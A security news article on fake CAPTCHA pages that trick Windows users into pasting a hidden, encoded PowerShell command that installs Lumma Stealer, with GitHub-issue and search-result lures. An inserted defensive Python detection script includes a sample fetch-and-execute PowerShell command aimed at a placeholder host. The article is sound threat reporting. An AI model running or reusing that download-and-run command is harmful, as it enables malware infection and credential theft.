Windows users targeted with fake human verification pages delivering malware
For a while now, security researchers have been warning about fake human verification pages tricking Windows users into inadvertently installing malware. A recently exposed campaign showed how some users end up on these pages.
Beware of fake human verification pages
In late August 2024, Palo Alto Networks’ Unit 42 spotted seven CAPTCHA-style human verification pages that were not what they seemed.
“These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware,” Unit 42 threat hunter Paul Michaud II explained.
The infection process (Source: PAN Unit 42)
More recently, CloudSEK researchers have identified more active pages hosted on various providers and using content delivery networks, still spreading the Lumma Stealer.
“[The] PowerShell script is copied to the clipboard via clicking on the ‘I’m not a robot’ button,” they clarified.
“Once the user pastes the PowerShell command into the Run dialog box, it will run PowerShell in a hidden window and execute the Base64-encoded command: powershell -w hidden -eC.”
Once decoded, the command fetches the contents of a text file hosted on the remote server; that file contains additional commands to download the Lumma Stealer, which the script then executes.
“If the downloaded file (dengo.zip) is extracted and executed on a Windows machine, the Lumma Stealer will become operational and establish connections with attacker-controlled domains,” they concluded, and noted that the malware delivered via this page can be easily changed.
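As an added illustration, not taken from the article or from any of the vendors it cites, the Python sketch below shows how a defender might flag this pattern in process-creation telemetry: a powershell.exe process whose parent is explorer.exe (the parent of anything launched from the Run dialog), started with a hidden window and an -EncodedCommand argument, with that argument decoded for analyst review. The event fields and sample events are constructed, and the decoded command uses a placeholder domain.

```python
import base64

# Any unambiguous prefix of -EncodedCommand is accepted by powershell.exe,
# as is the documented -ec alias (the article's sample uses "-eC").
def _is_encoded_flag(tok: str) -> bool:
    t = tok.lower()
    return t == "-ec" or (len(t) >= 2 and "-encodedcommand".startswith(t))

def _is_window_flag(tok: str) -> bool:  # -w, -win, -WindowStyle, ...
    t = tok.lower()
    return len(t) >= 2 and "-windowstyle".startswith(t)

def decode_encoded_command(b64: str):
    """-EncodedCommand carries Base64 of UTF-16LE text; None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def inspect_event(event: dict):
    """Return a finding if the event matches the paste-into-Run pattern
    (explorer.exe parent + encoded command), else None."""
    toks = event["cmdline"].split()
    hidden = any(_is_window_flag(t) and i + 1 < len(toks)
                 and toks[i + 1].lower() == "hidden" for i, t in enumerate(toks))
    encoded = next((toks[i + 1] for i, t in enumerate(toks)
                    if _is_encoded_flag(t) and i + 1 < len(toks)), None)
    if not (encoded and event["parent"].lower().endswith("\\explorer.exe")):
        return None
    return {"cmdline": event["cmdline"], "hidden_window": hidden,
            "decoded": decode_encoded_command(encoded)}

def scan(events):
    return [f for f in map(inspect_event, events) if f]

def _enc(text: str) -> str:  # builds the constructed sample's Base64 payload
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

# Constructed, simplified process-creation events (Sysmon Event ID 1 style).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",            # pasted into the Run dialog
     "cmdline": "powershell -w hidden -eC " + _enc(
         "Invoke-WebRequest http://placeholder.invalid/stage.txt | Invoke-Expression")},
    {"parent": r"C:\Windows\System32\svchost.exe",    # scheduled task, benign
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",            # user opened a console
     "cmdline": "powershell -NoExit"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print("suspicious:", finding["decoded"])
```

The same decode step is useful when reviewing the RunMRU history of an affected user profile, since the pasted command line is retained there after the Run dialog closes.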
How are targeted users directed to these pages?
Security researcher Ax Sharma has recently been tipped off about email alerts from legitimate GitHub servers that point to fake human verification pages.
After digging into the matter, he discovered that malware peddlers have been opening “issues” on open source repositories on GitHub and claiming that the project contains a “security vulnerability”.
Opening each such issue triggered GitHub to send email alerts containing its text to the repository’s contributors and subscribers.
The email alerts come from GitHub servers and are signed by the GitHub Security Team, but point to the github-scanner[.]com domain, which neither belongs to nor is used by GitHub. A fake human verification page is waiting there to deliver a trojan to potential victims.
Users should be aware of these ploys and should expect to encounter more campaigns with other “lures”. The same PowerShell-script-copying-and-running trick has previously been used in a ClearFake campaign documented by Proofpoint researchers.
UPDATE (September 23, 2024, 02:30 p.m. ET):
Secureworks incident responders have spotted the same trick getting used for targeting users searching for video streaming services via Google.
“The attack exploits a clever combination of social engineering and circumvention of browser security controls. It’s a new attack vector and presents a significant risk for organisations that don’t restrict what employees can run on their systems. Employees might be using corporate systems to browse for seemingly harmless content, but in this case, they are being tricked into actively executing malicious code,” said Rafe Pilling, Director of Threat Intelligence, Secureworks Counter Threat Unit.
“Cybercriminals are constantly evolving their tactics. In these cases, we’ve seen the stolen credentials harvested by the infostealers available on marketplaces very quickly. It’s crucial that organizations are actively educating teams on evolving techniques and up-to-date threat intelligence, as well as putting in place policies that mitigate risk.”